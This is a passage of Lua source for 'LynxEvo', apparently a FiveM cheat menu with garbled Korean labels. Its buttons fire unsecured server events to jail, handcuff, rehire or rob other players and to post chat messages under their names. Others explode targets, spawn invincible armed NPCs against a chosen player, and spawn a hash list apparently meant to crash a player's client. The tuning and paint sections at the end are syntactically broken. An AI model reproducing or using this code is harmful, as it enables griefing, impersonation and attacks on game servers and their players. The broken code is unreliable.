  7971. TriggerServerEvent('esx_jail:sendToJail', GetPlayerServerId(dY), 0)
  7972. TriggerServerEvent('js:jailuser', GetPlayerServerId(dY), 0, 'escaperino')
  7973. end
  7974. LynxEvo.Display()
  7975. elseif LynxEvo.IsMenuOpened('ESXTriggerini') then
  7976. if LynxEvo.Button('~h~~g~Revive Player') then
  7977. local ax = GetPlayerPed(SelectedPlayer)
  7978. local bK = GetEntityCoords(ax)
  7979. TriggerServerEvent('esx_ambulancejob:setDeathStatus', false)
  7980. local dZ = {
  7981. x = ESX.Math.Round(bK.x, 1),
  7982. y = ESX.Math.Round(bK.y, 1),
  7983. z = ESX.Math.Round(bK.z, 1)
  7984. }
  7985. RespawnPed(ax, dZ, 0.0)
  7986. StopScreenEffect('DeathFailOut')
  7987. DoScreenFadeIn(800)
  7988. elseif LynxEvo.Button('~h~~g~Give money to player from your wallet') then
  7989. local m = KeyboardInput('Enter amount of money to give', '', 100)
  7990. if m ~= '' then
  7991. TriggerServerEvent(
  7992. 'esx:giveInventoryItem',
  7993. GetPlayerServerId(SelectedPlayer),
  7994. 'item_money',
  7995. 'money',
  7996. m
  7997. )
  7998. end
  7999. elseif LynxEvo.Button('~h~~b~Handcuff Player') then
  8000. TriggerServerEvent('esx_policejob:handcuff', GetPlayerServerId(SelectedPlayer))
  8001. end
  8002. LynxEvo.Display()
  8003. elseif LynxEvo.IsMenuOpened('VRPPlayerTriggers') then
  8004. if LynxEvo.Button('~h~Transfer money from your bank') then
  8005. local d_ = KeyboardInput('Enter amount of money to give', '', 100)
  8006. local e0 = KeyboardInput('Enter VRP PERMA ID!', '', 100)
  8007. if d_ ~= '' then
  8008. local di = GetPlayerServerId(PlayerId())
  8009. TriggerEvent('bank:transfer', di, GetPlayerServerId(SelectedPlayer), d_)
  8010. TriggerServerEvent('bank:transfer', e0, d_)
  8011. end
  8012. end
  8013. LynxEvo.Display()
  8014. elseif LynxEvo.IsMenuOpened('ESXJobs2') then
  8015. if LynxEvo.Button('~h~Set Unemployed') then
  8016. TriggerServerEvent('NB:destituerplayer', GetPlayerServerId(SelectedPlayer))
  8017. UnemployedPlayer(SelectedPlayer)
  8018. elseif LynxEvo.Button('~h~Set ~b~Police ~s~Job') then
  8019. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), 'police', 3)
  8020. PolicePlayer(SelectedPlayer)
  8021. elseif LynxEvo.Button('~h~Set ~o~Mecano ~s~Job') then
  8022. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), 'mecano', 3)
  8023. MecanoPlayer(SelectedPlayer)
  8024. elseif LynxEvo.Button('~h~Set ~y~Taxi ~s~Job') then
  8025. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), 'taxi', 3)
  8026. TaxiPlayer(SelectedPlayer)
  8027. elseif LynxEvo.Button('~h~Set ~r~Ambulance ~s~Job') then
  8028. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), 'ambulance', 3)
  8029. AmbulancePlayer(SelectedPlayer)
  8030. elseif LynxEvo.Button('~h~Set ~g~Real Estate ~s~Job') then
  8031. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), 'realestateagent', 3)
  8032. RealEstateAgentPlayer(SelectedPlayer)
  8033. elseif LynxEvo.Button('~h~Set ~r~Car ~b~Dealer ~s~Job') then
  8034. TriggerServerEvent('NB:recruterplayer', GetPlayerServerId(SelectedPlayer), 'cardealer', 3)
  8035. CarDealerPlayer(SelectedPlayer)
  8036. end
  8037. LynxEvo.Display()
  8038. elseif LynxEvo.IsMenuOpened('?몃· 硫붾돱') then
  8039. if LynxEvo.MenuButton('~h~~p~#~s~AI(遊??뚰솚', 'AI(遊??뚰솚') then
  8040. elseif LynxEvo.Button('~h~~r~Fake ~s~Chat Message') then
  8041. local e1 = KeyboardInput('Enter message to send', '', 100)
  8042. local e2 = GetPlayerName(SelectedPlayer)
  8043. if e1 then
  8044. TriggerServerEvent(
  8045. '_chat:messageEntered',
  8046. e2,
  8047. {
  8048. 0,
  8049. 0x99,
  8050. 255
  8051. },
  8052. e1
  8053. )
  8054. end
  8055. elseif LynxEvo.Button('~h~~s~李⑤웾 ~r~?섏감?쒗궎湲?) then
  8056. ClearPedTasksImmediately(GetPlayerPed(SelectedPlayer))
  8057. elseif LynxEvo.Button('~h~~s~李⑤웾 ~y~??컻?쒗궎湲?) then
  8058. if IsPedInAnyVehicle(GetPlayerPed(SelectedPlayer), true) then
  8059. AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 4, 1337.0, false, true, 0.0)
  8060. else
  8061. av('~h~~b~?대떦 ?뚮젅?댁뼱??李⑤웾???묒듅?섍퀬 ?덉? ?딆뒿?덈떎.~s~.', false)
  8062. end
  8063. elseif LynxEvo.Button('~h~~r~Launch ~s~his car') then
  8064. if GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false) ~= 0 then
  8065. local e3 = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  8066. local e4 = GetEntityHeading(GetPlayerPed(SelectedPlayer))
  8067. local e5 = CreatePed(5, 68070371, e3, e4, true)
  8068. local e6 = CreateVehicle(GetHashKey('adder'), e3, e4, true, false)
  8069. SetPedIntoVehicle(e5, e6, -1)
  8070. else
  8071. av('~h~~b~?대떦 ?뚮젅?댁뼱??李⑤웾???묒듅?섍퀬 ?덉? ?딆뒿?덈떎.', false)
  8072. end
  8073. elseif LynxEvo.Button('~h~~r~諛붾굹??~p~?뚰떚') then
  8074. local bH = CreateObject(GetHashKey('p_crahsed_heli_s'), 0, 0, 0, true, true, true)
  8075. local bI = CreateObject(GetHashKey('prop_rock_4_big2'), 0, 0, 0, true, true, true)
  8076. local bJ = CreateObject(GetHashKey('prop_beachflag_le'), 0, 0, 0, true, true, true)
  8077. AttachEntityToEntity(
  8078. bH,
  8079. GetPlayerPed(SelectedPlayer),
  8080. GetPedBoneIndex(GetPlayerPed(SelectedPlayer), 57005),
  8081. 0.4,
  8082. 0,
  8083. 0,
  8084. 0,
  8085. 270.0,
  8086. 60.0,
  8087. true,
  8088. true,
  8089. false,
  8090. true,
  8091. 1,
  8092. true
  8093. )
  8094. AttachEntityToEntity(
  8095. bI,
  8096. GetPlayerPed(SelectedPlayer),
  8097. GetPedBoneIndex(GetPlayerPed(SelectedPlayer), 57005),
  8098. 0.4,
  8099. 0,
  8100. 0,
  8101. 0,
  8102. 270.0,
  8103. 60.0,
  8104. true,
  8105. true,
  8106. false,
  8107. true,
  8108. 1,
  8109. true
  8110. )
  8111. AttachEntityToEntity(
  8112. bJ,
  8113. GetPlayerPed(SelectedPlayer),
  8114. GetPedBoneIndex(GetPlayerPed(SelectedPlayer), 57005),
  8115. 0.4,
  8116. 0,
  8117. 0,
  8118. 0,
  8119. 270.0,
  8120. 60.0,
  8121. true,
  8122. true,
  8123. false,
  8124. true,
  8125. 1,
  8126. true
  8127. )
  8128. elseif LynxEvo.Button('~h~~r~??궗 ~s~?쒗궎湲?) then
  8129. AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 5, 3000.0, true, false, 100000.0)
  8130. AddExplosion(GetEntityCoords(GetPlayerPed(SelectedPlayer)), 5, 3000.0, true, false, true)
  8131. elseif LynxEvo.Button('~h~~r~媛뺢컙') then
  8132. RequestModelSync('a_m_o_acult_01')
  8133. RequestAnimDict('rcmpaparazzo_2')
  8134. while not HasAnimDictLoaded('rcmpaparazzo_2') do
  8135. Citizen.Wait(0)
  8136. end
  8137. if IsPedInAnyVehicle(GetPlayerPed(SelectedPlayer), true) then
  8138. local veh = GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), true)
  8139. while not NetworkHasControlOfEntity(veh) do
  8140. NetworkRequestControlOfEntity(veh)
  8141. Citizen.Wait(0)
  8142. end
  8143. SetEntityAsMissionEntity(veh, true, true)
  8144. DeleteVehicle(veh)
  8145. DeleteEntity(veh)
  8146. end
  8147. count = -0.2
  8148. for b = 1, 3 do
  8149. local x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(SelectedPlayer), true))
  8150. local bS = CreatePed(4, GetHashKey('a_m_o_acult_01'), x, y, z, 0.0, true, false)
  8151. SetEntityAsMissionEntity(bS, true, true)
  8152. AttachEntityToEntity(
  8153. bS,
  8154. GetPlayerPed(SelectedPlayer),
  8155. 4103,
  8156. 11816,
  8157. count,
  8158. 0.00,
  8159. 0.0,
  8160. 0.0,
  8161. 0.0,
  8162. 0.0,
  8163. false,
  8164. false,
  8165. false,
  8166. false,
  8167. 2,
  8168. true
  8169. )
  8170. ClearPedTasks(GetPlayerPed(SelectedPlayer))
  8171. TaskPlayAnim(
  8172. GetPlayerPed(SelectedPlayer),
  8173. 'rcmpaparazzo_2',
  8174. 'shag_loop_poppy',
  8175. 2.0,
  8176. 2.5,
  8177. -1,
  8178. 49,
  8179. 0,
  8180. 0,
  8181. 0,
  8182. 0
  8183. )
  8184. SetPedKeepTask(bS)
  8185. TaskPlayAnim(bS, 'rcmpaparazzo_2', 'shag_loop_a', 2.0, 2.5, -1, 49, 0, 0, 0, 0)
  8186. SetEntityInvincible(bS, true)
  8187. count = count - 0.4
  8188. end
  8189. elseif LynxEvo.Button('~h~~r~耳€?댁? ~s~媛€?먭린') then
  8190. x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(SelectedPlayer)))
  8191. roundx = tonumber(string.format('%.2f', x))
  8192. roundy = tonumber(string.format('%.2f', y))
  8193. roundz = tonumber(string.format('%.2f', z))
  8194. local e7 = 'prop_fnclink_05crnr1'
  8195. local e8 = GetHashKey(e7)
  8196. RequestModel(e8)
  8197. while not HasModelLoaded(e8) do
  8198. Citizen.Wait(0)
  8199. end
  8200. local e9 = CreateObject(e8, roundx - 1.70, roundy - 1.70, roundz - 1.0, true, true, false)
  8201. local ea = CreateObject(e8, roundx + 1.70, roundy + 1.70, roundz - 1.0, true, true, false)
  8202. SetEntityHeading(e9, -90.0)
  8203. SetEntityHeading(ea, 90.0)
  8204. FreezeEntityPosition(e9, true)
  8205. FreezeEntityPosition(ea, true)
  8206. elseif LynxEvo.Button('~h~~r~?꾨쾭嫄?~s~?뚮젅?댁뼱') then
  8207. local eb = 'xs_prop_hamburgher_wl'
  8208. local ec = GetHashKey(eb)
  8209. local ed = CreateObject(ec, 0, 0, 0, true, true, true)
  8210. AttachEntityToEntity(
  8211. ed,
  8212. GetPlayerPed(SelectedPlayer),
  8213. GetPedBoneIndex(GetPlayerPed(SelectedPlayer), 0),
  8214. 0,
  8215. 0,
  8216. -1.0,
  8217. 0.0,
  8218. 0.0,
  8219. 0,
  8220. true,
  8221. true,
  8222. false,
  8223. true,
  8224. 1,
  8225. true
  8226. )
  8227. elseif LynxEvo.Button('~h~~r~?꾨쾭嫄?~s~?뚮젅?댁뼱 李⑤웾') then
  8228. local eb = 'xs_prop_hamburgher_wl'
  8229. local ec = GetHashKey(eb)
  8230. local ed = CreateObject(ec, 0, 0, 0, true, true, true)
  8231. AttachEntityToEntity(
  8232. ed,
  8233. GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false),
  8234. GetEntityBoneIndexByName(GetVehiclePedIsIn(GetPlayerPed(SelectedPlayer), false), 'chassis'),
  8235. 0,
  8236. 0,
  8237. -1.0,
  8238. 0.0,
  8239. 0.0,
  8240. 0,
  8241. true,
  8242. true,
  8243. false,
  8244. true,
  8245. 1,
  8246. true
  8247. )
  8248. elseif LynxEvo.Button('~h~~r~釉붾옓?€ ~s~媛€?먭린') then
  8249. j = true
  8250. x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(SelectedPlayer)))
  8251. roundx = tonumber(string.format('%.2f', x))
  8252. roundy = tonumber(string.format('%.2f', y))
  8253. roundz = tonumber(string.format('%.2f', z))
  8254. local ee = 'sr_prop_spec_tube_xxs_01a'
  8255. local ef = GetHashKey(ee)
  8256. RequestModel(ef)
  8257. RequestModel(smashhash)
  8258. while not HasModelLoaded(ef) do
  8259. Citizen.Wait(0)
  8260. end
  8261. local eg = CreateObject(ef, roundx, roundy, roundz - 5.0, true, true, false)
  8262. SetEntityRotation(eg, 0.0, 90.0, 0.0)
  8263. local eh = -356333586
  8264. local bR = 'WEAPON_SNOWBALL'
  8265. for i = 0, 10 do
  8266. local bK = GetEntityCoords(eg)
  8267. RequestModel(eh)
  8268. Citizen.Wait(50)
  8269. if HasModelLoaded(eh) then
  8270. local ped =
  8271. CreatePed(
  8272. 21,
  8273. eh,
  8274. bK.x + math.sin(i * 2.0),
  8275. bK.y - math.sin(i * 2.0),
  8276. bK.z - 5.0,
  8277. 0,
  8278. true,
  8279. true
  8280. ) and
  8281. CreatePed(
  8282. 21,
  8283. eh,
  8284. bK.x - math.sin(i * 2.0),
  8285. bK.y + math.sin(i * 2.0),
  8286. bK.z - 5.0,
  8287. 0,
  8288. true,
  8289. true
  8290. )
  8291. NetworkRegisterEntityAsNetworked(ped)
  8292. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8293. local ei = PedToNet(ped)
  8294. NetworkSetNetworkIdDynamic(ei, false)
  8295. SetNetworkIdCanMigrate(ei, true)
  8296. SetNetworkIdExistsOnAllMachines(ei, true)
  8297. Citizen.Wait(500)
  8298. NetToPed(ei)
  8299. GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
  8300. SetCurrentPedWeapon(ped, GetHashKey(bR), true)
  8301. SetEntityInvincible(ped, true)
  8302. SetPedCanSwitchWeapon(ped, true)
  8303. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  8304. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8305. TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
  8306. else
  8307. Citizen.Wait(0)
  8308. end
  8309. end
  8310. end
  8311. elseif LynxEvo.Button('~h~~o~_!_ ~s~?뚮젅?댁뼱 ~r~?낃뎄湲?~o~_!_') then
  8312. local ej = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  8313. local ek = {
  8314. 0x9CF21E0F,
  8315. 0x34315488,
  8316. 0x6A27FEB1,
  8317. 0xCB2ACC8,
  8318. 0xC6899CDE,
  8319. 0xD14B5BA3,
  8320. 0xD9F4474C,
  8321. 0x32A9996C,
  8322. 0x69D4F974,
  8323. 0xCAFC1EC3,
  8324. 0x79B41171,
  8325. 0x1075651,
  8326. 0xC07792D4,
  8327. 0x781E451D,
  8328. 0x762657C6,
  8329. 0xC2E75A21,
  8330. 0xC3C00861,
  8331. 0x81FB3FF0,
  8332. 0x45EF7804,
  8333. 0xE65EC0E4,
  8334. 0xE764D794,
  8335. 0xFBF7D21F,
  8336. 0xE1AEB708,
  8337. 0xA5E3D471,
  8338. 0xD971BBAE,
  8339. 0xCF7A9A9D,
  8340. 0xC2CC99D8,
  8341. 0x8FB233A4,
  8342. 0x24E08E1F,
  8343. 0x337B2B54,
  8344. 0xB9402F87,
  8345. 0x4F2526DA,
  8346. 0xc0000005
  8347. }
  8349. for i = 1, #ek do
  8350. local a = CreateObject(ek[i], ej, true, true, true)
  8351. end
  8352. end
  8353. LynxEvo.Display()
  8354. elseif LynxEvo.IsMenuOpened('AI(遊??뚰솚') then
  8355. if LynxEvo.Button('~h~~y~AK~s~臾댁옣 寃쎌같?밴났?€ ~r~?뚰솚') then
  8356. local bQ = 's_m_y_swat_01'
  8357. local bR = 'WEAPON_ASSAULTRIFLE'
  8358. for i = 0, 10 do
  8359. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  8360. RequestModel(GetHashKey(bQ))
  8361. Citizen.Wait(50)
  8362. if HasModelLoaded(GetHashKey(bQ)) then
  8363. local ped =
  8364. CreatePed(21, GetHashKey(bQ), bK.x + i, bK.y - i, bK.z, 0, true, true) and
  8365. CreatePed(21, GetHashKey(bQ), bK.x - i, bK.y + i, bK.z, 0, true, true)
  8366. NetworkRegisterEntityAsNetworked(ped)
  8367. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8368. local ei = PedToNet(ped)
  8369. NetworkSetNetworkIdDynamic(ei, false)
  8370. SetNetworkIdCanMigrate(ei, true)
  8371. SetNetworkIdExistsOnAllMachines(ei, true)
  8372. Citizen.Wait(500)
  8373. NetToPed(ei)
  8374. GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
  8375. SetEntityInvincible(ped, true)
  8376. SetPedCanSwitchWeapon(ped, true)
  8377. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  8378. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8379. TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
  8380. else
  8381. Citizen.Wait(0)
  8382. end
  8383. end
  8384. end
  8385. elseif LynxEvo.Button('~h~~y~RPG~s~臾댁옣 寃쎌같?밴났?€ ~r~?뚰솚') then
  8386. local bQ = 's_m_y_swat_01'
  8387. local bR = 'weapon_rpg'
  8388. for i = 0, 10 do
  8389. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  8390. RequestModel(GetHashKey(bQ))
  8391. Citizen.Wait(50)
  8392. if HasModelLoaded(GetHashKey(bQ)) then
  8393. local ped =
  8394. CreatePed(21, GetHashKey(bQ), bK.x + i, bK.y - i, bK.z, 0, true, true) and
  8395. CreatePed(21, GetHashKey(bQ), bK.x - i, bK.y + i, bK.z, 0, true, true)
  8396. NetworkRegisterEntityAsNetworked(ped)
  8397. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8398. local ei = PedToNet(ped)
  8399. NetworkSetNetworkIdDynamic(ei, false)
  8400. SetNetworkIdCanMigrate(ei, true)
  8401. SetNetworkIdExistsOnAllMachines(ei, true)
  8402. Citizen.Wait(500)
  8403. NetToPed(ei)
  8404. GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
  8405. SetEntityInvincible(ped, true)
  8406. SetPedCanSwitchWeapon(ped, true)
  8407. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  8408. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8409. TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
  8410. else
  8411. Citizen.Wait(0)
  8412. end
  8413. end
  8414. end
  8415. elseif LynxEvo.Button('~h~~y~?뚮젅?닿굔~s~臾댁옣 寃쎌같?밴났?€ ~r~?뚰솚') then
  8416. local bQ = 's_m_y_swat_01'
  8417. local bR = 'weapon_flaregun'
  8418. for i = 0, 10 do
  8419. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  8420. RequestModel(GetHashKey(bQ))
  8421. Citizen.Wait(50)
  8422. if HasModelLoaded(GetHashKey(bQ)) then
  8423. local ped =
  8424. CreatePed(21, GetHashKey(bQ), bK.x + i, bK.y - i, bK.z, 0, true, true) and
  8425. CreatePed(21, GetHashKey(bQ), bK.x - i, bK.y + i, bK.z, 0, true, true)
  8426. NetworkRegisterEntityAsNetworked(ped)
  8427. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8428. local ei = PedToNet(ped)
  8429. NetworkSetNetworkIdDynamic(ei, false)
  8430. SetNetworkIdCanMigrate(ei, true)
  8431. SetNetworkIdExistsOnAllMachines(ei, true)
  8432. Citizen.Wait(500)
  8433. NetToPed(ei)
  8434. GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
  8435. SetEntityInvincible(ped, true)
  8436. SetPedCanSwitchWeapon(ped, true)
  8437. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  8438. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8439. TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
  8440. else
  8441. Citizen.Wait(0)
  8442. end
  8443. end
  8444. end
  8445. elseif LynxEvo.Button('~h~~y~?덉씪嫄?s~臾댁옣 寃쎌같?밴났?€ ~r~?뚰솚') then
  8446. local bQ = 's_m_y_swat_01'
  8447. local bR = 'weapon_railgun'
  8448. for i = 0, 10 do
  8449. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  8450. RequestModel(GetHashKey(bQ))
  8451. Citizen.Wait(50)
  8452. if HasModelLoaded(GetHashKey(bQ)) then
  8453. local ped =
  8454. CreatePed(21, GetHashKey(bQ), bK.x + i, bK.y - i, bK.z, 0, true, true) and
  8455. CreatePed(21, GetHashKey(bQ), bK.x - i, bK.y + i, bK.z, 0, true, true)
  8456. NetworkRegisterEntityAsNetworked(ped)
  8457. if DoesEntityExist(ped) and not IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8458. local ei = PedToNet(ped)
  8459. NetworkSetNetworkIdDynamic(ei, false)
  8460. SetNetworkIdCanMigrate(ei, true)
  8461. SetNetworkIdExistsOnAllMachines(ei, true)
  8462. Citizen.Wait(500)
  8463. NetToPed(ei)
  8464. GiveWeaponToPed(ped, GetHashKey(bR), 9999, 1, 1)
  8465. SetEntityInvincible(ped, true)
  8466. SetPedCanSwitchWeapon(ped, true)
  8467. TaskCombatPed(ped, GetPlayerPed(SelectedPlayer), 0, 16)
  8468. elseif IsEntityDead(GetPlayerPed(SelectedPlayer)) then
  8469. TaskCombatHatedTargetsInArea(ped, bK.x, bK.y, bK.z, 500)
  8470. else
  8471. Citizen.Wait(0)
  8472. end
  8473. end
  8474. end
  8475. end
  8476. LynxEvo.Display()
  8477. elseif
  8478. IsDisabledControlPressed(0, 121) or IsDisabledControlPressed(0, 47) and IsDisabledControlPressed(0, 21)
  8479. then
  8480. if mhaonn then
  8481. LynxEvo.OpenMenu('Luxury')
  8482. else
  8483. bE()
  8484. end
  8485. LynxEvo.Display()
  8486. elseif LynxEvo.IsMenuOpened('?붾젅?ы듃 硫붾돱') then
  8487. if LynxEvo.Button('~h~~g~吏€?뺥븳 怨녹쑝濡?~s~?붾젅?ы듃') then
  8488. c6()
  8489. elseif LynxEvo.Button('~h~~g~二쇰?李⑤웾~s~?쇰줈 ?붾젅?ы듃') then
  8490. b_()
  8491. elseif LynxEvo.Button('~h~~r~?ъ슜???낅젰醫뚰몴濡?~s~?붾젅?ы듃') then
  8492. bT()
  8493. elseif LynxEvo.Button('~h~留듭뿉 ~r~?ъ슜??吏€??~s~?꾩씠肄?留뚮뱾湲?) then
  8494. bX()
  8495. elseif
  8496. LynxEvo.CheckBox(
  8497. '~h~~g~醫뚰몴 ~s~?쒖떆',
  8498. showCoords,
  8499. function(dR)
  8500. showCoords = dR
  8501. end
  8502. )
  8503. then
  8504. end
  8505. LynxEvo.Display()
  8506. elseif LynxEvo.IsMenuOpened('臾닿린 硫붾돱') then
  8507. if LynxEvo.MenuButton('~h~~p~#~s~ 臾닿린?뚰솚', 'WeaponTypes') then
  8508. elseif LynxEvo.Button('~h~~g~紐⑤뱺臾닿린 ?뚰솚') then
  8509. for i = 1, #b6 do
  8510. GiveWeaponToPed(PlayerPedId(-1), GetHashKey(b6[i]), 1000, false, false)
  8511. end
  8512. elseif LynxEvo.Button('~h~~r~紐⑤뱺臾닿린 ?쒓굅') then
  8513. RemoveAllPedWeapons(PlayerPedId(-1), true)
  8514. elseif LynxEvo.Button('~h~臾닿린 ?대젮?볤린') then
  8515. local ak = GetPlayerPed(-1)
  8516. local b = GetSelectedPedWeapon(ak)
  8517. SetPedDropsInventoryWeapon(GetPlayerPed(-1), b, 0, 2.0, 0, -1)
  8518. elseif LynxEvo.Button('~h~~g~紐⑤뱺?뚮젅?댁뼱 ~s~紐⑤뱺臾닿린 二쇨린') then
  8519. for el = 0, 128 do
  8520. if el ~= PlayerId(-1) and GetPlayerServerId(el) ~= 0 then
  8521. for i = 1, #b6 do
  8522. GiveWeaponToPed(GetPlayerPed(el), GetHashKey(b6[i]), 1000, false, false)
  8523. end
  8524. end
  8525. end
  8526. elseif LynxEvo.Button('~h~~r~紐⑤뱺?뚮젅?댁뼱 ~s~紐⑤뱺臾닿린 ?쒓굅') then
  8527. for el = 0, 128 do
  8528. if el ~= PlayerId(-1) and GetPlayerServerId(el) ~= 0 then
  8529. for i = 1, #b6 do
  8530. RemoveWeaponFromPed(GetPlayerPed(el), GetHashKey(b6[i]))
  8531. end
  8532. end
  8533. end
  8534. elseif LynxEvo.Button('~h~珥앹븣?ъ깮') then
  8535. for i = 1, #b6 do
  8536. AddAmmoToPed(PlayerPedId(-1), GetHashKey(b6[i]), 200)
  8537. end
  8538. elseif
  8539. LynxEvo.CheckBox(
  8540. '~h~~r~?곕?吏€??,
  8541. oneshot,
  8542. function(dR)
  8543. oneshot = dR
  8544. end
  8545. )
  8546. then
  8547. elseif
  8548. LynxEvo.CheckBox(
  8549. '~h~~g~R~r~a~y~i~b~n~o~b~r~o~g~w ~s~?뚮젅?닿굔',
  8550. rainbowf,
  8551. function(dR)
  8552. rainbowf = dR
  8553. end
  8554. )
  8555. then
  8556. elseif
  8557. LynxEvo.CheckBox(
  8558. '~h~湲곗감 珥?,
  8559. VehicleGun,
  8560. function(dR)
  8561. VehicleGun = dR
  8562. end
  8563. )
  8564. then
  8565. elseif
  8566. LynxEvo.CheckBox(
  8567. '~h~?€?몄뒪 珥?,
  8568. DeleteGun,
  8569. function(dR)
  8570. DeleteGun = dR
  8571. end
  8572. )
  8573. then
  8574. end
  8575. LynxEvo.Display()
  8576. elseif LynxEvo.IsMenuOpened('tunings') then
  8577. veh = GetVehiclePedIsUsing(PlayerPedId())
  8578. for i, dE in pairs(bl) do
  8579. if == 'extra' and #checkValidVehicleExtras() ~= 0 then
  8580. if LynxEvo.MenuButton(, then
  8581. end
  8582. elseif == 'neon' then
  8583. if LynxEvo.MenuButton(, then
  8584. end
  8585. elseif == 'paint' then
  8586. if LynxEvo.MenuButton(, then
  8587. end
  8588. elseif == 'wheeltypes' then
  8589. if LynxEvo.MenuButton(, then
  8590. end
  8591. elseif == 'headlight' then
  8592. if LynxEvo.MenuButton(, then
  8593. end
  8594. elseif == 'licence' then
  8595. if LynxEvo.MenuButton(, then
  8596. end
  8597. else
  8598. local az = checkValidVehicleMods(
  8599. for ci, dL in pairs(az) do
  8600. if LynxEvo.MenuButton(, then
  8601. end
  8602. break
  8603. end
  8604. end
  8605. end
  8606. if IsToggleModOn(veh, 22) then
  8607. xenonStatus = 'Installed'
  8608. else
  8609. xenonStatus = 'Not Installed'
  8610. end
  8611. if LynxEvo.Button('Xenon Headlight', xenonStatus) then
  8612. if not IsToggleModOn(veh, 22) then
  8613. ToggleVehicleMod(veh, 22, not IsToggleModOn(veh, 22))
  8614. else
  8615. ToggleVehicleMod(veh, 22, not IsToggleModOn(veh, 22))
  8616. end
  8617. end
  8618. LynxEvo.Display()
  8619. elseif LynxEvo.IsMenuOpened('performance') then
  8620. veh = GetVehiclePedIsUsing(PlayerPedId())
  8621. for i, dE in pairs(bm) do
  8622. if LynxEvo.MenuButton(, then
  8623. end
  8624. end
  8625. if IsToggleModOn(veh, 18) then
  8626. turboStatus = 'Installed'
  8627. else
  8628. turboStatus = 'Not Installed'
  8629. end
  8630. if LynxEvo.Button('~h~~b~Turbo ~h~Tune', turboStatus) then
  8631. if not IsToggleModOn(veh, 18) then
  8632. ToggleVehicleMod(veh, 18, not IsToggleModOn(veh, 18))
  8633. else
  8634. ToggleVehicleMod(veh, 18, not IsToggleModOn(veh, 18))
  8635. end
  8636. end
  8637. LynxEvo.Display()
  8638. elseif LynxEvo.IsMenuOpened('primary') then
  8639. LynxEvo.MenuButton('~h~~p~#~s~ Classic', 'classic1')
  8640. LynxEvo.MenuButton('~h~~p~#~s~ Metallic', 'metallic1')
  8641. LynxEvo.MenuButton('~h~~p~#~s~ Matte', 'matte1')
  8642. LynxEvo.MenuButton('~h~~p~#~s~ Metal', 'metal1')
  8643. LynxEvo.Display()
  8644. elseif LynxEvo.IsMenuOpened('secondary') then
  8645. LynxEvo.MenuButton('~h~~p~#~s~ Classic', 'classic2')
  8646. LynxEvo.MenuButton('~h~~p~#~s~ Metallic', 'metallic2')
  8647. LynxEvo.MenuButton('~h~~p~#~s~ Matte', 'matte2')
  8648. LynxEvo.MenuButton('~h~~p~#~s~ Metal', 'metal2')
  8649. LynxEvo.Display()
  8650. elseif LynxEvo.IsMenuOpened('rimpaint') then
  8651. LynxEvo.MenuButton('~h~~p~#~s~ Classic', 'classic3')
  8652. LynxEvo.MenuButton('~h~~p~#~s~ Metallic', 'metallic3')
  8653. LynxEvo.MenuButton('~h~~p~#~s~ Matte', 'matte3')
  8654. LynxEvo.MenuButton('~h~~p~#~s~ Metal', 'metal3')
  8655. LynxEvo.Display()
  8656. elseif LynxEvo.IsMenuOpened('classic1') then
  8657. for dK, em in pairs(br) do
  8658. tp, ts = GetVehicleColours(veh)
  8659. if tp == and not bg then
  8660. pricetext = 'Installed'
  8661. else
  8662. if bg and tp == then
  8663. pricetext = 'Previewing'
  8664. else
  8665. pricetext = 'Not Installed'
  8666. end
  8667. end
  8668. curprim, cursec = GetVehicleColours(veh)
  8669. if LynxEvo.Button(, pricetext) then
  8670. if not bg then
  8671. bi = 'paint'
  8672. bk = false
  8673. oldprim, oldsec = GetVehicleColours(veh)
  8674. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  8675. bh = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  8676. SetVehicleColours(veh,, oldsec)
  8677. SetVehicleExtraColours(veh,, oldwheelcolour)
  8678. bg = true
  8679. elseif bg and curprim == then
  8680. SetVehicleColours(veh,, oldsec)
  8681. SetVehicleExtraColours(veh,, oldwheelcolour)
  8682. bg = false
  8683. bi = -1
  8684. bh = -1
  8685. elseif bg and curprim ~= then
